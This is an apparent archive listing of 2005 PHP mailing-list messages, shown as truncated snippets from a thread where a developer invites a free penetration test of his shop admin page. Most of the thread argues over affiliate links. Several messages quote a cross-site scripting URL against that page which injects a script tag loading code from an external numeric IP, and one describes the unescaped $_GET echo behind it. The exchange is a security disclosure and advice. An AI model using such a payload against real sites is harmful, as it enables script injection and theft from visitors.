Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
Hehe, well put...a few things you forgot to write: Ryan A and Rory Browne got so irritated because it's like talking to a tree in English when the tree only understands some other language :-D that they tried to throw in the towel I was so fed up I was going to drop the whole thing because cer

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
>BTW, what do you call to a person that throws stones to another and then >runs away to not face the consequences?! Fine, I'll play your game a little longer...but offlist as I think the list has had enough of this, I'm also a bit busy now so expect a reply from me after a few hours. Regards, Rya

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Manuel Lemos
Hello, on 05/30/2005 02:21 PM Ryan A said the following: Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (rec

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
Hi, This is getting pretty irritating because by now even a stone would have understood what I was trying to say...so either you are playing dumb or you just don't want to understand, that said, this is my last response as I have much better things to do than say the same thing over and over...

RE: [PHP] Re: Free penetration test

2005-05-30 Thread Murray @ PlanetThoughtful
> For me, of course there is nothing wrong on the PHP Group help > themselves making money with referrals. My point is that it is pretty > common to not distract people with the details of who gets what with > referrals because it does not change anything for who follows a link > with or without t

RE: [PHP] Re: Free penetration test

2005-05-30 Thread Kim Madsen
> -Original Message- > From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED] > Sent: Saturday, May 28, 2005 3:48 PM > To: Ryan A > Cc: php > Subject: Re: [PHP] Re: Free penetration test > > Ryan A wrote: > > That is extremely generous of you as I didn't really think

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Manuel Lemos
Hello, on 05/27/2005 11:50 PM Ryan A said the following: I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could h

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Ryan A
> > mostly in Swedish...I can give you a > "star > > account" (Star accounts are the > > paid accounts) for you to login and test the site, but do you think you > > could still test it since it's mostly > > in Swedish? > Yes, I think I can manage it. The language is fairly irrelevant, I check > b

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Rasmus Lerdorf
Ryan A wrote: > That is extremely generous of you as I didn't really think you would have the > time considering the > amount of projects,books etc you are involved with (yep, I read your CV on > your site :-D ), but > I would like to take you up on your offer as I am sure to learn something > from

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Ryan A
Hi, > > Is it bad to give field names the same name as their database > > counterpart? i.e. In a database the first name column might be known as > > 'fname'. Should a form field called 'fname' NOT be created? I actually had the same question a little while ago and after doing some reading it lef

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rory Browne
Okay: 1: Calm down. Your sensationalism and paranoia make you look like a nutcase. (no offence) 2: > That would be irrelevant because nothing changes for the anybody that > follows the link with or without the aff code. The service is still free Obviously we don't consider it irrelevant. That'

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, y

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/27/2005 05:30 PM Rory Browne said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server O

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
Hi, > > I have requested the free test several times and it was very useful > > because it brought my attention to aspects that I was not considering, > > some related to PHP in specific and other related to Internet in general. > > > fair enough, you could have given him the link to the page dir

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Andy Pieters
On Saturday 28 May 2005 01:05, Chris W. Parker wrote: > Rasmus Lerdorf > > on Friday, May 27, 2005 11:58 AM said: > >>> You have all sorts of problems at that URL. To start with, here is > >>> a cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Chris W. Parker wrote: > Rasmus Lerdorf > on Friday, May 27, 2005 11:58 AM said: > > You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22

RE: [PHP] Re: Free penetration test

2005-05-27 Thread Chris W. Parker
Rasmus Lerdorf on Friday, May 27, 2005 11:58 AM said: >>> You have all sorts of problems at that URL. To start with, here is >>> a cross-site scripting hack: >>> >>> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 >>> src%3D%22http://3

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Chris W. Parker wrote: > One question. (Because I'm a lame brain when it comes to security as I'm > not good at imagining how things can be exploited): > > Is it bad to give field names the same name as their database > counterpart? i.e. In a database the first name column might be known as > 'fna

RE: [PHP] Re: Free penetration test

2005-05-27 Thread Chris W. Parker
Rasmus Lerdorf on Friday, May 27, 2005 4:15 PM said: > He was apparently doing something along the lines of: > > foreach($_GET as $key=>$val) { > echo << > EOL; > } > > Probably just a laziness thing. Generally you will want to keep track > of which query

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rory Browne
On 5/27/05, Manuel Lemos <[EMAIL PROTECTED]> wrote: > Hello, > > on 05/27/2005 02:30 PM Ryan A said the following: > >>You may want to try Security Space services. They perform many types of > >>security checks remotely including penetration tests that may reveal > >>serious vulnerabilities in you

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
> > Umm, you forgot to mention that you are "connected" to that site and you > get a commission for sending them clients, if they sign up. > > Nothing wrong with getting an affiliate buck mind you, I have a few > > affiliate accounts around too, but I (and others on the list I have noticed, Jay B f

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Andy Pieters wrote: > On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: > >>You have all sorts of problems at that URL. To start with, here is a >>cross-site scripting hack: >> >>http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 >>src%3D%22http://3423329163/v > > > Hi

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Andy Pieters
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: > You have all sorts of problems at that URL. To start with, here is a > cross-site scripting hack: > > http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 >src%3D%22http://3423329163/v Hi Thank you! I just saw the potent

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS ver

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
> on 05/23/2005 06:19 AM Andy Pieters said the following: > >> I am looking at where I can get my system tested for penetration. >> >> In case someone here would like to have a go >> >> This is the url >> >> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ >> >> It is actually a kind of CM

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
> You may want to try Security Space services. They perform many types of > security checks remotely including penetration tests that may reveal > serious vulnerabilities in your servers. Such vulnerabilities include > holes, in your server OS version, Web and e-mail servers and even in the > PHP v

[PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if som